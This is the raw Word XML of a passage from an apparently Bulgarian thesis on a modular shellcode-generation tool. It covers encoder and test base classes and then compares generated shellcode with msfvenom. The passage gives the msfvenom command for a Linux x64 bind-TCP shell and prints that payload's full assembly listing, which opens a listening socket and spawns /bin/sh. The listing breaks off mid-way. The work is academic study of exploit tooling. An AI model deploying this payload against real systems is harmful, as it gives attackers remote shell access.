      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Базов клас за всеки енкодер. Той дефинира интерфейс за кодиране на шелкод. Той предвижда 2 метода - </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">build() </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> prepare_build()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, който не е задължителен. </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>build()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> е методът за финално форматиране на кода, а </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>prepare_build()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за работа, която трябва да бъде свършена преди това, например преобразуването на шелкода от символен низ до шестнайсетично кодирана поредица от байтове. Този клас може да бъде наследяван директно, но за да се намали излишният код, всяка архитектура може да дефинира свой базов енкодер, който да замести </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>build()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> метода, като добави код специфичен за дадената архитектура. Такъв пример е ArchEncoder за amd64.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_ckhes6b5pygx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="146"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>BaseTest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Това е последният базов клас. Той е основата за всеки тестов модул. Тъй като това е единственият клас от модули, които са предвидени за езика C, той няма код специфичен за платформата. Един тест може да поддържа много архитектури, стига да е съвместим с техните особености. Такъв пример е тестът в test_ret_to_code.py. Той тества шелкода, като просто насочва регистъра за връщане на изпълнение към него. Заради аритметиката с указатели, той би работил с всичко архитектури, чийто стек расте надолу.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00875CB1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:hanging="270"/>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_j2d28kqytubn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="148" w:name="_Toc3540805"/>
      <w:bookmarkEnd w:id="147"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Четвърта глава</w:t>
      </w:r>
      <w:r w:rsidR="00875CB1">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>Анализ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> на генерирания shellcode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00567E8F" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Модулната структура внася повторен код и действия, необходими за съвместимостта на отделните модули. Също така може да има излишни инструкции заради повторение на модули. Сегменти на примерните реализации са прототипи на модулите в инструмента, а msfvenom предлага завършени и добре оптимизирани решения. Примерните шелкод реализации и тези от msfvenom са подходящи за сравнение на генерирания шелкод. По-подробна информация за използваните поредици от команди може да се намери в </w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t>приложение 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_70g596bgsnc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="150" w:name="_Toc3540806"/>
      <w:bookmarkEnd w:id="149"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Класически</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Инструментът генерира класически шел много лесно. Потребителят може да избере функция generate и да избере правилните модули - execve() и exit(). Това става с поредицата generate -&gt; amd64 -&gt; append a module -&gt; execve -&gt; append a module -&gt; exit -&gt; build module, в случая параметрите по подразбиране са подходящи. Сорс кодът е аналогичен на този от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref2190886 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Разширен вариант на класически шел</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, защото модулите за този шелкод са непроменени от примера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_7jk3a6yt78ap" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="151"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Класическият шел няма практическа употреба в днешно време и msfvenom не го поддържа. Вместо това за сравнение може да се използва друг възможно най-прост шелкод, като кандидати са linux/x64/shell_bind_tcp и linux/x64/shell/bind_tcp. Командата msfvenom --platform linux -a x64 -p linux/x64/shell_bind_tcp -f c генерира по-простия от двата варианта. За извличане на изходните инструкции може да се използва деасмеблираща програма, но авторите са ги включили като коментари. Те са следните:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_qwhhlt7palz1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="153" w:name="_nb51so3szj8b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="152"/>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>pushq  $0x29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_ujg8kv6wuf2p" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="154"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_36eygz44tcw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="155"/>
      <w:r w:rsidRPr="00112660">
        <w:t>cltd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_7zt6uhnw0a8h" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="156"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_cpzl6ia8ksa" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="157"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_180c3jefa8mt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="158"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_av37xtkqid56" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="159"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_1lf1eacjlj4l" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="160"/>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_9udgzipbeku4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="161"/>
      <w:r w:rsidRPr="00112660">
        <w:t>xchg   %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_9bba7niic8n" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="162"/>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rdx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_aj9pzevjh8pa" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="163"/>
      <w:r w:rsidRPr="00112660">
        <w:t>movl   $0xb3150002,(%rsp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_qapinijqqra9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_wahjcv565td0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="165"/>
      <w:r w:rsidRPr="00112660">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsp,%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_p2339s84hi9l" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="166"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_8zjc3tan855m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="167"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rdx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_hhre1h3vhrxj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="168"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_asfuwsz4h25x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="169"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_h22n4x75tcfb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="170"/>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_7gvvr2onzsdi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="171"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_l0mby4zdqihe" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="172"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_ewdq4yriuwwk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="173"/>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_dxvn3ph8gw8t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="174"/>
      <w:r w:rsidRPr="00112660">
        <w:t>xor</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsi,%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_fwo3cgsznmka" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="175"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x2b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_ngodithui67j" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_dhyeht6cuz0y" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="177"/>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_bdes2neyigln" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="178"/>
      <w:r w:rsidRPr="00112660">
        <w:t>xchg   %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_vjwjn886zd4w" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="179"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_c1240n6mtd5j" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="180"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_qr1yat7nd0im" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="181"/>
      <w:r w:rsidRPr="00112660">
        <w:t>dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_nklbrb6ywao" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="182"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_jru3i9f9qhhr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="183"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_r7eg5sqji6j2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="_nwwbm6drho4d" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="185"/>
      <w:r w:rsidRPr="00112660">
        <w:t>jne</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>33 &lt;dup2_loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_lctxzsdhgyb3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="186"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pushq  $0x3b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_ewx2wqipdbga" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="187"/>
      <w:r w:rsidRPr="00112660">
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_9ubj4ue6yafw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="188"/>
      <w:r w:rsidRPr="00112660">
        <w:t>cltd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_oqd1lmrxatbb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="189"/>
      <w:r w:rsidRPr="00112660">
        <w:t>movabs $0x68732f6e69622f,%rbx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_9233xaka9afj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_sowr15fjml2s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rbx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_x89qe73egjm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="192"/>
      <w:r w:rsidRPr="00112660">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsp,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_1odhadi285z6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="193"/>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rdx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_npyxpa2wrnmb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="194"/>
      <w:r w:rsidRPr="00112660">
        <w:t>push   %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_41rhrdppwh5v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="195"/>
      <w:r w:rsidRPr="00112660">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>%rsp,%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_1n483fd0to6d" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r w:rsidRPr="00112660">
        <w:t>syscall</w:t>
      </w:r>
